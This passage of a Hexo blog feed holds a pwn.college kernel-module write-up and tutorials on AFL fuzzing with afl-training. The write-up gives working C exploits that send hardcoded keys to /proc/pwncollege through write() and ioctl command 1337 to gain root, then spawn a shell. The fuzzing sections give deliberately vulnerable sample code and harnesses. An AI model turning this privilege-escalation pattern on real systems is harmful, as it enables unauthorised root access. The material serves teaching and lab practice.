    if (fd < 0) {
        perror("open /proc/pwncollege");
        return 1;
    }
    char key[] = "izqbzupwclnrwugw";
    write(fd, key, sizeof(key)); // the write handler calls win(), which makes this process root
    system("/bin/sh");           // spawn a shell with the elevated privileges
    return 0;
}
</code></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401232221330.png" alt="image-20240123222127244"></p>
<h1 id="level4-0"><a href="#level4-0" class="headerlink" title="level4.0"></a>level4.0</h1>
<p>Much like the previous levels, but the write handler is gone and replaced by an <code>ioctl</code> handler.</p>
<p>We only need to control <code>cmd</code> and <code>key</code>.</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401232224991.png" alt="image-20240123222408848"></p>
<p>exp:</p>
<figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>

int main() {
    int fd = open("/proc/pwncollege", O_RDWR);
    if (fd < 0) {
        perror("open /proc/pwncollege");
        return 1;
    }
    char key[] = "bzwgjygwcmubnzhp";
    ioctl(fd, 1337, key); // cmd 1337 with the right key runs win()
    system("/bin/sh");
    return 0;
}
</code></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401232225885.png" alt="image-20240123222557771"></p>]]></content>
</entry>
<entry>
<title>Learning afl-fuzz through afl-training</title>
<link href="/2024/01/14/%E9%80%9A%E8%BF%87afl-traning%E5%AD%A6%E4%B9%A0afl-fuzz/"/>
<url>/2024/01/14/%E9%80%9A%E8%BF%87afl-traning%E5%AD%A6%E4%B9%A0afl-fuzz/</url>
<content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>本文是记录通过afl-training熟悉afl-fuzz的一些用法</p><p>关于afl-fuzz的安装以及一些基础的使用在前面的文章已经提到过了,这里就不再赘述了</p><p>参考文章:</p><p><a href="https://tttang.com/archive/1508/#toc_0x01-quickstart">https://tttang.com/archive/1508/#toc_0x01-quickstart</a></p><p>afl-training项目地址:</p><p><a href="https://github.com/mykter/afl-training">https://github.com/mykter/afl-training</a></p><h1 id="quickstart"><a href="#quickstart" class="headerlink" title="quickstart"></a>quickstart</h1><p>quickstart是通过一个简单的程序来体验afl-fuzz的使用过程</p><p>编译里面的vulnerable.c</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs routeros">cd quickstart<br><span class="hljs-attribute">CC</span>=afl-clang-fast <span class="hljs-attribute">AFL_HARDEN</span>=1 make<br></code></pre></td></tr></table></figure><p>第二行命令是将编译器换成了afl-clang-fast并加入了环境变量AFL_HARDEN=1,然后进行make</p><p>查看一下makefile:</p><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs ruby">youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span><span class="hljs-variable">$ </span>cat <span class="hljs-title class_">Makefile</span> <br><span class="hljs-comment"># Enable debugging and suppress pesky warnings</span><br><span class="hljs-variable constant_">CFLAGS</span> <span class="hljs-string">?=</span> -g -w<br><br><span class="hljs-symbol">all:</span>vulnerable<br><br><span 
class="hljs-symbol">clean:</span><br>rm -f vulnerable<br><br><span class="hljs-symbol">vulnerable:</span> vulnerable.c<br><span class="hljs-variable">${</span><span class="hljs-variable constant_">CC</span>} <span class="hljs-variable">${</span><span class="hljs-variable constant_">CFLAGS</span>} vulnerable.c -o vulnerable<br></code></pre></td></tr></table></figure><p><code>make</code>默认会编译all,all编译的是vulnerable,所以最终会形成<code>afl-clang-fast -g -w vulnerable.c -o vulnerable</code>。</p><p>vulnerable.c的源代码:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span 
class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br></pre></td><td class="code"><pre><code class="hljs cpp">$ cat vulnerable.c<br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><string.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><unistd.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><br><br><span class="hljs-meta">#<span 
class="hljs-keyword">define</span> INPUTSIZE 100</span><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">process</span><span class="hljs-params">(<span class="hljs-type">char</span> *input)</span></span><br><span class="hljs-function"></span>{<br> <span class="hljs-type">char</span> *out;<br> <span class="hljs-type">char</span> *rest;<br> <span class="hljs-type">int</span> len;<br> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strncmp</span>(input, <span class="hljs-string">"u "</span>, <span class="hljs-number">2</span>) == <span class="hljs-number">0</span>)<br> { <span class="hljs-comment">// upper case command</span><br> <span class="hljs-type">char</span> *rest;<br> len = <span class="hljs-built_in">strtol</span>(input + <span class="hljs-number">2</span>, &rest, <span class="hljs-number">10</span>); <span class="hljs-comment">// how many characters of the string to upper-case</span><br> rest += <span class="hljs-number">1</span>; <span class="hljs-comment">// skip the first char (should be a space)</span><br> out = <span class="hljs-built_in">malloc</span>(len + <span class="hljs-built_in">strlen</span>(input)); <span class="hljs-comment">// could be shorter, but play it safe</span><br> <span class="hljs-keyword">if</span> (len > (<span class="hljs-type">int</span>)<span class="hljs-built_in">strlen</span>(input))<br> {<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Specified length %d was larger than the input!\n"</span>, len);<br> <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br> }<br> <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (out == <span class="hljs-literal">NULL</span>)<br> {<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Failed to allocate memory\n"</span>);<br> <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br> }<br> <span 
class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i != len; i++)<br> {<br> out[i] = rest[i] - <span class="hljs-number">32</span>; <span class="hljs-comment">// only handles ASCII</span><br> }<br> out[len] = <span class="hljs-number">0</span>;<br> <span class="hljs-built_in">strcat</span>(out, rest + len); <span class="hljs-comment">// append the remaining text</span><br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s"</span>, out);<br> <span class="hljs-built_in">free</span>(out);<br> }<br> <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strncmp</span>(input, <span class="hljs-string">"head "</span>, <span class="hljs-number">5</span>) == <span class="hljs-number">0</span>)<br> { <span class="hljs-comment">// head command</span><br> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strlen</span>(input) > <span class="hljs-number">6</span>)<br> {<br> len = <span class="hljs-built_in">strtol</span>(input + <span class="hljs-number">4</span>, &rest, <span class="hljs-number">10</span>);<br> rest += <span class="hljs-number">1</span>; <span class="hljs-comment">// skip the first char (should be a space)</span><br> rest[len] = <span class="hljs-string">'\0'</span>; <span class="hljs-comment">// truncate string at specified offset</span><br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s\n"</span>, rest);<br> }<br> <span class="hljs-keyword">else</span><br> {<br> <span class="hljs-built_in">fprintf</span>(stderr, <span class="hljs-string">"head input was too small\n"</span>);<br> }<br> }<br> <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strcmp</span>(input, <span class="hljs-string">"surprise!\n"</span>) == <span class="hljs-number">0</span>)<br> {<br> <span class="hljs-comment">// easter egg!</span><br> *(<span 
class="hljs-type">char</span> *)<span class="hljs-number">1</span> = <span class="hljs-number">2</span>;<br> }<br> <span class="hljs-keyword">else</span><br> {<br> <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br> }<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">char</span> *argv[])</span></span><br><span class="hljs-function"></span>{<br> <span class="hljs-type">char</span> *usage = <span class="hljs-string">"Usage: %s\n"</span><br> <span class="hljs-string">"Text utility - accepts commands and data on stdin and prints results to stdout.\n"</span><br> <span class="hljs-string">"\tInput | Output\n"</span><br> <span class="hljs-string">"\t------------------+-----------------------\n"</span><br> <span class="hljs-string">"\tu <N> <string> | Uppercased version of the first <N> bytes of <string>.\n"</span><br> <span class="hljs-string">"\thead <N> <string> | The first <N> bytes of <string>.\n"</span>;<br> <span class="hljs-type">char</span> input[INPUTSIZE] = {<span class="hljs-number">0</span>};<br><br> <span class="hljs-comment">// Slurp input</span><br> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">read</span>(STDIN_FILENO, input, INPUTSIZE) < <span class="hljs-number">0</span>)<br> {<br> <span class="hljs-built_in">fprintf</span>(stderr, <span class="hljs-string">"Couldn't read stdin.\n"</span>);<br> }<br><br> <span class="hljs-type">int</span> ret = <span class="hljs-built_in">process</span>(input);<br> <span class="hljs-keyword">if</span> (ret)<br> {<br> <span class="hljs-built_in">fprintf</span>(stderr, usage, argv[<span class="hljs-number">0</span>]);<br> };<br> <span class="hljs-keyword">return</span> ret;<br>}<br></code></pre></td></tr></table></figure><p>基本功能:</p><p>u 
:对字符串的前n个字节变成大写字符串;<br>head :截取字符串的前n个字符;<br>surprise!:隐藏功能,直接触发崩溃。<br>运行afl-fuzz对程序进行测试:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">afl-fuzz -i inputs -o output ./vulnerable<br></code></pre></td></tr></table></figure><p>inputs目录是输入的种子目录,由用户提供,应该是精心准备的样本以有效提高fuzz效率,可以看到项目提供的inputs目录中包含触发u和head的样例:</p><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs elixir">youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span><span class="hljs-variable">$ </span>ls inputs/<br>head u<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span><span class="hljs-variable">$ </span>cat inputs/head <br>head <span class="hljs-number">20</span> <span class="hljs-title class_">This</span> string is going to be truncated at the <span class="hljs-number">20</span>th position.<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span><span class="hljs-variable">$ </span>cat inputs/u<br>u <span class="hljs-number">4</span> capsme<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span>$<br></code></pre></td></tr></table></figure><p>fuzz结果:</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401142124159.png" alt="image-20240114212413941"></p><p><code>out</code>有相应的产出,其中<code>crashes</code>目录存储的是崩溃样本;<code>queue</code>目录存储的是成果触发新路径的样本即有趣的样本(即新路径)。</p><p>查看output当中的crashes并运行查看效果</p><p><img 
src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401142127219.png" alt="image-20240114212726170"></p><p>通过这个小的<code>demo</code>来体验<code>afl fuzz</code>的过程,对<code>afl</code>有了初步的了解。</p><h1 id="harness"><a href="#harness" class="headerlink" title="harness"></a>harness</h1><p>harness的作用是通过demo来体验如何针对具体的库代码来编写测试框架。</p><p>这个项目当中的流程演示图:</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401142130722.png" alt="image-20240114213011640"></p><p>研究测试人员创建输入目录并提供变异的语料库(input corpus);针对测试代码编写测试框架(write harness),经过afl-clang-fast/afl-gcc插桩编译后产生支持反馈模糊测试的二进制程序;afl-fuzz从队列(queue)中挑选种子进行变异;变异后的样本扔给测试框架(harness)运行并监控运行结果;如果崩溃,则存储到崩溃目录中(crashes);如果样本成功触发了新路径,则将它添加到队列(queue)当中。</p><p>本次实验是通过编写代码对library库进行测试</p><p>library.h:</p><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">#<span class="hljs-keyword">include</span> <unistd.h><br><span class="hljs-comment">// an 'nprintf' implementation - print the first len bytes of data</span><br>void lib<span class="hljs-constructor">_echo(<span class="hljs-params">char</span> <span class="hljs-operator">*</span><span class="hljs-params">data</span>, <span class="hljs-params">ssize_t</span> <span class="hljs-params">len</span>)</span>;<br><br><span class="hljs-comment">// optimised multiply - returns x*y</span><br><span class="hljs-built_in">int</span> lib<span class="hljs-constructor">_mul(<span class="hljs-params">int</span> <span class="hljs-params">x</span>, <span class="hljs-params">int</span> <span class="hljs-params">y</span>)</span>;<br></code></pre></td></tr></table></figure><p>library.c:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><string.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><assert.h></span></span><br><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">"library.h"</span></span><br><br><span class="hljs-function"><span class="hljs-type">void</span> <span 
class="hljs-title">lib_echo</span><span class="hljs-params">(<span class="hljs-type">char</span> *data, <span class="hljs-type">ssize_t</span> len)</span></span>{<br><span class="hljs-keyword">if</span>(<span class="hljs-built_in">strlen</span>(data) == <span class="hljs-number">0</span>) {<br><span class="hljs-keyword">return</span>;<br>}<br><span class="hljs-type">char</span> *buf = <span class="hljs-built_in">calloc</span>(<span class="hljs-number">1</span>, len);<br><span class="hljs-built_in">strncpy</span>(buf, data, len);<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s"</span>,buf);<br><span class="hljs-built_in">free</span>(buf);<br><br><span class="hljs-comment">// A crash so we can tell the harness is working for lib_echo</span><br><span class="hljs-keyword">if</span>(data[<span class="hljs-number">0</span>] == <span class="hljs-string">'p'</span>) {<br><span class="hljs-keyword">if</span>(data[<span class="hljs-number">1</span>] == <span class="hljs-string">'o'</span>) {<br><span class="hljs-keyword">if</span>(data[<span class="hljs-number">2</span>] ==<span class="hljs-string">'p'</span>) {<br><span class="hljs-keyword">if</span>(data[<span class="hljs-number">3</span>] == <span class="hljs-string">'!'</span>) {<br><span class="hljs-built_in">assert</span>(<span class="hljs-number">0</span>);<br>}<br>}<br>}<br>}<br>}<br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">lib_mul</span><span class="hljs-params">(<span class="hljs-type">int</span> x, <span class="hljs-type">int</span> y)</span></span>{<br><span class="hljs-keyword">if</span>(x%<span class="hljs-number">2</span> == <span class="hljs-number">0</span>) {<br><span class="hljs-keyword">return</span> y << x;<br>} <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (y%<span class="hljs-number">2</span> == <span class="hljs-number">0</span>) {<br><span class="hljs-keyword">return</span> x << y;<br>} <span 
class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (x == <span class="hljs-number">0</span>) {<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>} <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (y == <span class="hljs-number">0</span>) {<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>} <span class="hljs-keyword">else</span> {<br><span class="hljs-keyword">return</span> x * y;<br>}<br>}<br></code></pre></td></tr></table></figure><p>本次实验是通过编写代码对这两个函数进行fuzz</p><p>两个函数的功能</p><ul><li>lib_echo:输出参数data中的前len个字符串;</li><li>lib_mul:输出参数x乘以y的值。</li></ul><p>为了实现目的,编写的程序必须具有一下功能:</p><ul><li><p>编译出来的程序必须是可执行的,即需要一个main函数,从而被编译成可执行的二进制程序;</p></li><li><p>具备反馈信息的能力以使afl更高效的fuzz,即编写出来的代码需要使用afl-clang-fast或afl-clang或afl-gcc进行插桩编译;</p></li><li><p>提供数据接口以供afl进行变异;即两个函数使用的参数数据应来自于标准输入或文件,使得afl可以很方便的变异。</p></li></ul><p>最终编写出如下代码:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span 
class="hljs-string"><unistd.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><string.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">"library.h"</span></span><br><br><span class="hljs-comment">// fixed size buffer based on assumptions about the maximum size that is likely necessary to exercise all aspects of the target function</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> SIZE 100</span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">char</span>* argv[])</span> {<br> <span class="hljs-keyword">if</span>((argc == <span class="hljs-number">2</span>) && <span class="hljs-built_in">strcmp</span>(argv[<span class="hljs-number">1</span>], <span class="hljs-string">"echo"</span>) == <span class="hljs-number">0</span>) {<br> <span class="hljs-comment">// make sure buffer is initialized to eliminate variable behaviour that isn't dependent on the input.</span><br> <span class="hljs-type">char</span> input[SIZE] = {<span class="hljs-number">0</span>};<br><br> <span class="hljs-type">ssize_t</span> length;<br> length = read(STDIN_FILENO, input, SIZE);<br><br> lib_echo(input, length);<br> } <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> ((argc == <span class="hljs-number">2</span>) && <span class="hljs-built_in">strcmp</span>(argv[<span class="hljs-number">1</span>], <span class="hljs-string">"mul"</span>) == <span class="hljs-number">0</span>) {<br> <span class="hljs-type">int</span> a = <span class="hljs-number">0</span>, b = <span class="hljs-number">0</span>; <span class="hljs-comment">// initialise both operands, so a short read cannot leave stale stack data in a</span><br> read(STDIN_FILENO, &a, <span class="hljs-number">4</span>);<br> read(STDIN_FILENO, &b, <span 
class="hljs-number">4</span>);<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%d\n"</span>, lib_mul(a,b));<br> } <span class="hljs-keyword">else</span> {<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Usage: %s mul|echo\n"</span>, argv[<span class="hljs-number">0</span>]);<br> }<br>}<br></code></pre></td></tr></table></figure><p>As you can see, a command-line argument in main decides whether lib_echo or lib_mul is fuzzed; the chosen function is then called with data read from standard input; finally the program is instrumented and compiled with afl-clang-fast.</p><p>The build command is:</p><figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs llvm">AFL_HARDEN<span class="hljs-operator">=</span><span class="hljs-number">1</span> afl-clang-<span class="hljs-keyword">fast</span> harness.<span class="hljs-keyword">c</span> library.<span class="hljs-keyword">c</span> -o harness<br></code></pre></td></tr></table></figure><p>Next, fuzz the lib_echo library function first:</p><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs elixir">youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/harness</span><span class="hljs-variable">$ </span>rm -rf input_echo/<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/harness</span><span class="hljs-variable">$ </span>mkdir input_echo<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/harness</span><span class="hljs-variable">$ </span>echo aaaa > input_echo/seed<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/harness</span><span class="hljs-variable">$ </span>afl-fuzz -i input_echo/ -o output_echo ./harness echo<br></code></pre></td></tr></table></figure><p>It did not take long for crashes to appear:</p><p><img 
src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401142159636.png" alt="image-20240114215948496"></p><p>Then fuzz lib_mul:</p><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs elixir">youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/harness</span><span class="hljs-variable">$ </span>mkdir input_mul<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/harness</span><span class="hljs-variable">$ </span>echo <span class="hljs-string">"1 3 "</span> > input_mul/seed<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/harness</span><span class="hljs-variable">$ </span>afl-fuzz -i input_mul -o output_mul ./harness mul<br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401142235223.png" alt="image-20240114223558136"></p><p>This <code>demo</code> shows how, when fuzzing a specific target, to write a harness on top of <code>afl</code> so that the code can be fuzzed effectively.</p>]]></content>
</entry>
<entry>
<title>A First Look at afl-fuzz</title>
<link href="/2024/01/13/%E5%88%9D%E6%8E%A2afl-fuzz/"/>
<url>/2024/01/13/%E5%88%9D%E6%8E%A2afl-fuzz/</url>
<content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h1><p>I have wanted to start learning fuzzing for a long time, but kept putting it off for about half a year. Partly my ability to read source code is too weak, and partly I probably have not put enough effort into studying. In the meantime 九哥 even invited hollk to give a session on fuzzing, but unfortunately after picking up the basic usage I never went any deeper.</p><p>This post mainly covers the basic usage of afl-fuzz.</p><p>References:</p><p><a href="https://xz.aliyun.com/t/4314?time__1311=n4+xnD0D9DgDcBQKDtD/ia4BKmqE=WDI2hhrrD&alichlgref=https://www.google.com/">https://xz.aliyun.com/t/4314?time__1311=n4%2BxnD0D9DgDcBQKDtD%2Fia4BKmqE%3DWDI2hhrrD&alichlgref=https%3A%2F%2Fwww.google.com%2F</a></p><p><a href="https://tttang.com/archive/1508/">https://tttang.com/archive/1508/</a></p><h1 id="AFL-Fuzz介绍"><a href="#AFL-Fuzz介绍" class="headerlink" title="AFL-Fuzz介绍"></a>Introduction to AFL-Fuzz</h1><p>Fuzzing is a testing method that finds vulnerabilities in software by constructing test inputs and running the software against them in large numbers. In CTF, fuzzing may not be used much, but in real-world vulnerability research its simplicity and efficiency have made it a very mainstream technique.</p><p>AFL, short for American Fuzzy Lop, is a very handy open-source fuzzing tool developed by Google security engineer Michał Zalewski. It can fuzz binary programs efficiently to uncover potential memory-safety bugs such as stack overflows, heap overflows, use-after-free and double free. Because it needs to instrument the relevant code, AFL is mainly used to test open-source software; combined with tools such as QEMU it can also fuzz closed-source binaries, though execution speed suffers.</p><p>How it works:</p><p>It instruments the program while recompiling it from source (compile-time instrumentation) and automatically generates test cases to explore new execution paths inside the binary. AFL can also test binaries without source code, but that requires QEMU.</p><h1 id="AFL界面介绍"><a href="#AFL界面介绍" class="headerlink" title="AFL界面介绍"></a>The AFL status screen</h1><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401130050565.png" alt="image-20240113005059484"></p><h2 id="process-timing"><a href="#process-timing" class="headerlink" title="process timing"></a>process timing</h2><p>This shows how long the fuzzer has been running, when the last new execution path was found, when the last crash occurred and when the last timeout occurred.</p><p>The second item, the time of the last new path, deserves attention. If the target binary or the command-line arguments are wrong, the execution path never changes, so if no new path has been found since fuzzing started, check whether the binary or the command line is at fault. AFL also warns about this situation on its own.</p><h2 id="overall-results"><a href="#overall-results" class="headerlink" title="overall results"></a>overall 
results</h2><p>This includes the total number of cycles run, the total number of paths, the number of crashes and the number of timeouts.</p><p>The cycle count is a useful reference for deciding when to stop fuzzing. As fuzzing goes on the count keeps growing and its colour changes from magenta to yellow, then blue, then green. In general, once it turns green there is little left to exercise and continuing to fuzz is unlikely to find anything new; at that point we can stop the run with Ctrl-C.</p><h2 id="stage-progress"><a href="#stage-progress" class="headerlink" title="stage progress"></a>stage progress</h2><p>This includes the fuzzing strategy currently being run, its progress, the total number of target executions and the execution speed.</p><p>The execution speed shows at a glance whether the run is fast enough. If it is too slow, say below 500 executions per second, testing takes a very long time; if that happens we need to tune and optimise our fuzzing further.</p><p>This is only a brief overview; for the full description see the <a href="http://lcamtuf.coredump.cx/afl/status_screen.txt">official documentation</a>.</p><h1 id="安装"><a href="#安装" class="headerlink" title="安装"></a>Installation</h1><p>First download the source from the official site: <a href="https://gitcode.com/mirrors/google/afl/overview">https://gitcode.com/mirrors/google/afl/overview</a></p><p>Build it (the source tree will also be useful for later reading):</p><figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs gauss"><span class="hljs-built_in">make</span><br>sudo <span class="hljs-built_in">make</span> install<br></code></pre></td></tr></table></figure><p>After running these commands the installation should succeed; typing afl- in a terminal and pressing Tab lists the following commands:</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401130044559.png" alt="image-20240113004432472"></p><h1 id="使用AFL插桩程序(有源码)"><a href="#使用AFL插桩程序(有源码)" class="headerlink" title="使用AFL插桩程序(有源码)"></a>Using AFL to instrument a program (with source)</h1><p>I chose the <a href="https://github.com/mykter/afl-training/tree/main/quickstart">quickstart</a> from <a href="https://github.com/mykter/afl-training">afl-training</a>.</p><p><code>quickstart</code> walks through using <code>afl</code> by fuzzing a simple 